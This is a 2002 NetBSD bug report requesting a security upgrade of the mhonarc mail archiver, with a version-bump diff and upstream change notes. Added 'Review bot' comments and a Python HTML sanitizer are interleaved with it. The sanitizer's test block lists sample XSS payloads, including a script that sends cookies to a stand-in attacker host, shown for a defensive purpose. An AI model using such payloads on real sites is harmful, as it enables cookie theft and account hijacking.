Subject: pkg/19366: mhonarc package has cross-site-scripting vulnerabilities
To: None <gnats-bugs@gnats.netbsd.org>
From: Eric Gillespie <epg@pretzelnet.org>
List: netbsd-bugs
Date: 12/12/2002 16:48:47
>Number: 19366
>Category: pkg
>Synopsis: mhonarc package has cross-site-scripting vulnerabilities
>Confidential: no
>Severity: serious
>Priority: high
>Responsible: pkg-manager
>State: open
>Class: sw-bug
>Submitter-Id: net
>Arrival-Date: Thu Dec 12 13:49:00 PST 2002
>Closed-Date:
>Last-Modified:
>Originator:
>Release: NetBSD 1.6
>Organization:
>Environment:
System: NetBSD wundagore.pretzelnet.org 1.6 NetBSD 1.6 ($Id: WUNDAGORE 435 2002-10-02 02:08:24Z epg $) #4: Sun Nov 24 15:22:10 EST 2002 epg@wundagore.pretzelnet.org:/usr/src/sys/arch/i386/compile/WUNDAGORE i386
Architecture: i386
Machine: i386
>Description:
The version of mhonarc in pkgsrc (2.5.11) contains cross-site-scripting
vulnerabilities. No exploits are currently known for any of these.
>How-To-Repeat:
>Fix:
Upgrade to 2.5.13. Summary of changes below the diff, see
CHANGES file for details.
Index: Makefile
===================================================================
RCS file: /cvsroot/pkgsrc/mail/mhonarc/Makefile,v
retrieving revision 1.10
diff -a -u -r1.10 Makefile
--- Makefile 2002/08/23 01:48:26 1.10
+++ Makefile 2002/12/12 21:34:11
@@ -1,8 +1,8 @@
# $NetBSD: Makefile,v 1.10 2002/08/23 01:48:26 grant Exp $
#
-DISTNAME= MHonArc2.5.11
-PKGNAME= mhonarc-2.5.11
+DISTNAME= MHonArc2.5.13
+PKGNAME= mhonarc-2.5.13
CATEGORIES= mail
MASTER_SITES= http://www.oac.uci.edu/indiv/ehood/tar/ \
ftp://hhobel.phl.univie.ac.at/MHonArc/
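Review bot: the Makefile hunk changes only DISTNAME and PKGNAME, and the rest of the submission touches only distinfo, so there is no PLIST diff and nothing under patches/ is updated; before committing, confirm that the 2.5.13 tarball installs the same file list as 2.5.11 (regenerate the PLIST after a test install and diff it) and, if the package carries any files under patches/, that they still apply, since the 2.5.12/2.5.13 notes below name readmail.pl and m2h_external::filter, exactly the files a local patch would be likely to touch. The `$NetBSD: Makefile,v 1.10 ...` keyword line is left alone for cvs to expand, which is correct.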
Index: distinfo
===================================================================
RCS file: /cvsroot/pkgsrc/mail/mhonarc/distinfo,v
retrieving revision 1.6
diff -a -u -r1.6 distinfo
--- distinfo 2002/08/23 01:48:25 1.6
+++ distinfo 2002/12/12 21:34:11
@@ -1,4 +1,4 @@
$NetBSD: distinfo,v 1.6 2002/08/23 01:48:25 grant Exp $
-SHA1 (MHonArc2.5.11.tar.bz2) = 65960e6cfe8056efacbd90936eb00d88ec9ddad5
-Size (MHonArc2.5.11.tar.bz2) = 467400 bytes
+SHA1 (MHonArc2.5.13.tar.bz2) = 1c4543c3b96091e47bae47efa0b9585c6496f8ac
+Size (MHonArc2.5.13.tar.bz2) = 476495 bytes
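Review bot: the new `SHA1 (MHonArc2.5.13.tar.bz2) = 1c4543c3...` and `Size ... = 476495 bytes` lines are only as trustworthy as the file they were computed from; for a security update, record in the commit which of the two MASTER_SITES the 2.5.13 distfile was fetched from and check the digest against the one upstream publishes for MHonArc2.5.13.tar.bz2 rather than relying solely on a checksum generated over a locally downloaded file. Nothing else in the hunk needs changing; the `$NetBSD: distinfo,v 1.6 ...` keyword line is again left for cvs.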
Changes from 2.5.12 to 2.5.13:
* DBFILE resource can now be set to an absolute pathname.
* readmail.pl updated to handle MHTML messages better.
* readmail.pl handling of malformed multipart messages improved.
* Fixed problem where some message attachments were "lost".
* Various bug-fixes and improvements to m2h_external::filter,
most importantly, fixing cross-site-scripting holes.
Changes from 2.5.11 to 2.5.12:
* Strip more tags and attributes that could potentially be used for
XSS exploits in the HTML filter. This is more of a preemptive
change since no new exploits have been reported.
* DATEFIELDS resource now supports indexed field names.
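The 2.5.12 and 2.5.13 entries above describe the HTML filter stripping tags and attributes that can carry script into an archive page. As an added illustration, not MHonArc's own code (its filter is m2h_external::filter, written in Perl, and is not reproduced here), the following Python sanitizer shows the allowlist form of that check as an archive renderer would apply it to each message body: a fixed set of harmless tags survives, only href is kept on <a> and only after its scheme has been inspected with control characters and entity encoding removed, every on* and style attribute is dropped, <script>/<style> are discarded together with their contents, and all text is re-escaped. The tag and attribute lists, the sanitize() and safe_href() names, and the sample payloads in the usage block are assumptions chosen for this example, not taken from the package or from the CHANGES file.

```python
"""Allowlist HTML sanitizer for rendering mail bodies in a web archive.

Added example (not MHonArc code). The tag/attribute lists and the sample
inputs below are assumptions chosen for illustration.
"""
import re
from html import escape
from html.parser import HTMLParser

# Tags that may survive; anything else is dropped (its text content is kept).
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "ul", "ol", "li",
                "blockquote", "pre", "code", "a"}
VOID_TAGS = {"br"}
# Per-tag attribute allowlist: no on*, style or src attribute anywhere.
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_SCHEMES = {"http", "https", "mailto"}
# Elements whose *contents* are discarded too, not just their tags.
DROP_WITH_CONTENT = {"script", "style"}

_CTRL_WS = re.compile(r"[\x00-\x20\x7f]")
_SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):", re.IGNORECASE)


def safe_href(value):
    """Return a usable href, or None if its scheme could execute script.

    Browsers skip tabs, newlines and other control characters when reading
    the scheme, so "java\tscript:" is still javascript:; those characters are
    removed before the check (and from the returned value).
    """
    if value is None:
        return None
    cleaned = _CTRL_WS.sub("", value)
    m = _SCHEME.match(cleaned)
    if m is None:
        return cleaned  # relative URL: no scheme to abuse
    return cleaned if m.group(1).lower() in SAFE_SCHEMES else None


class MailHtmlSanitizer(HTMLParser):
    """Rebuilds the fragment from parsed tokens instead of regex-editing it."""

    def __init__(self):
        # convert_charrefs=True: attribute values such as &#106;avascript:
        # reach the handlers already decoded, so entities cannot hide a scheme.
        super().__init__(convert_charrefs=True)
        self.out = []
        self._drop_depth = 0  # > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self._drop_depth += 1
            return
        if self._drop_depth or tag not in ALLOWED_TAGS:
            return  # unknown tag (img, iframe, object, ...) is dropped
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, ()):
                continue  # drops onmouseover=, style=, target=, ...
            if name == "href":
                value = safe_href(value)
                if value is None:
                    continue
            kept.append(' %s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self._drop_depth = max(0, self._drop_depth - 1)
            return
        if self._drop_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self._drop_depth:
            self.out.append(escape(data, quote=False))  # text is re-escaped

    def handle_comment(self, data):
        pass  # comments (including IE conditional comments) never survive


def sanitize(fragment):
    """Sanitize one HTML mail-body fragment and return the rebuilt HTML."""
    p = MailHtmlSanitizer()
    p.feed(fragment)
    p.close()
    return "".join(p.out)


if __name__ == "__main__":
    # Constructed inputs modelled on common XSS payloads seen in HTML mail.
    samples = [
        '<p onmouseover="alert(1)">hello</p>',
        '<a href="JaVaScRiPt:alert(1)">click</a>',
        '<a href=" &#106;ava&#9;script:alert(1)">click</a>',
        '<img src=x onerror="alert(1)">',
        '<script>document.location="http://evil.invalid/?"+document.cookie'
        '</script><b>1 &lt; 2</b>',
        '<a href="http://example.invalid/?q=1&amp;r=2">ok</a>',
    ]
    for s in samples:
        print("%r\n    -> %r" % (s, sanitize(s)))
```

The wording of the 2.5.12 entry ("strip more tags and attributes") is the denylist pattern, which has to be extended every time a new tag or attribute turns out to be scriptable; an allowlist such as the one above needs no such maintenance, because anything the renderer has not explicitly approved never reaches the page. The entity and control-character handling in safe_href is the part most often missed: a filter that compares the raw attribute text against "javascript:" misses both `&#106;avascript:` and `java&#9;script:`, which the browser decodes before it reads the scheme.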
>Release-Note:
>Audit-Trail:
>Unformatted: